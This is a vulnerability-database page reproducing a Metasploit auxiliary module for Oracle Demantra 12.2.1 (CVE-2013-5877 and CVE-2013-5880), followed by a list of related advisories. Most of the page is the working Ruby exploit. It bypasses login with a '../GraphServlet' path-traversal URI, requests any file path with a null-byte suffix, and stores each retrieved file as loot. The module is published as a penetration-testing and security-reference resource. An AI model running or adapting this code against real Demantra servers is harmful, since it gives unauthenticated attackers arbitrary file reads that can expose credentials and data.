Lucene search
K

Oracle Demantra Arbitrary File Retrieval with Authentication Bypass

🗓️ 27 Mar 2014 04:53:12Reported by Oliver GruskovnjakType 
metasploit
 metasploit
🔗 www.rapid7.com👁 36 Views

Oracle Demantra Arbitrary File Retrieval with Authentication Bypass. Exploits file download vulnerability in Oracle Demantra 12.2.1 with authentication bypass

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Oracle Demantra 12.2.1 - Arbitrary File Disclosure
1 Mar 201400:00
zdt
Circl
CVE-2013-5877
1 Mar 201400:00
circl
Circl
CVE-2013-5880
14 Jan 201400:00
circl
Check Point Advisories
Oracle Demantra 1221 Arbitrary File Disclosure - Ver2 (CVE-2013-5877)
26 Mar 201500:00
checkpoint_advisories
CVE
CVE-2013-5877
15 Jan 201400:30
cve
CVE
CVE-2013-5880
15 Jan 201400:30
cve
Cvelist
CVE-2013-5877
15 Jan 201400:30
cvelist
Cvelist
CVE-2013-5880
15 Jan 201400:30
cvelist
Metasploit
Oracle Demantra Database Credentials Leak
7 Apr 201418:42
metasploit
NVD
CVE-2013-5877
15 Jan 201416:11
nvd
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle Demantra Arbitrary File Retrieval with Authentication Bypass',
      'Description'    => %q{
        This module exploits a file download vulnerability found in Oracle
        Demantra 12.2.1 in combination with an authentication bypass. By
        combining these exposures, an unauthenticated user can retrieve any file
        on the system by referencing the full file path to any file a vulnerable
        machine.
      },
      'References'     =>
        [
          [ 'CVE', '2013-5877'],
          [ 'CVE', '2013-5880'],
          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5877/'],
          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5880/']
        ],
      'Author'         =>
        [
          'Oliver Gruskovnjak'
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => '2014-02-28'
    ))

    register_options(
      [
        Opt::RPORT(8080),
        OptBool.new('SSL',   [false, 'Use SSL', false]),
        OptString.new('FILEPATH', [true, 'The name of the file to download', 'c:/windows/win.ini'])
      ])
  end

  def run_host(ip)
    filename = datastore['FILEPATH']
    authbypass = "/demantra/common/loginCheck.jsp/../../GraphServlet"

    res = send_request_cgi({
      'uri' => normalize_uri(authbypass),
      'method' => 'POST',
      'encode_params' => false,
      'vars_post' => {
        'filename' => "#{filename}%00"
      }
    })

    if res.nil? or res.body.empty?
      fail_with(Failure::UnexpectedReply, "No content retrieved from: #{ip}")
    end

    if res.code == 404
      print_error("#{rhost}:#{rport} - File not found")
      return
    end

    if res.code == 200
      print_status("#{ip}:#{rport} returns: #{res.code.to_s}")
      fname = File.basename(datastore['FILEPATH'])
      path = store_loot(
        'oracle.demantra',
        'application/octet-stream',
        ip,
        res.body,
        fname)

      print_good("#{ip}:#{rport} - File saved in: #{path}")
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
0.5Low risk
Vulners AI Score0.5
CVSS 25
EPSS0.59558
36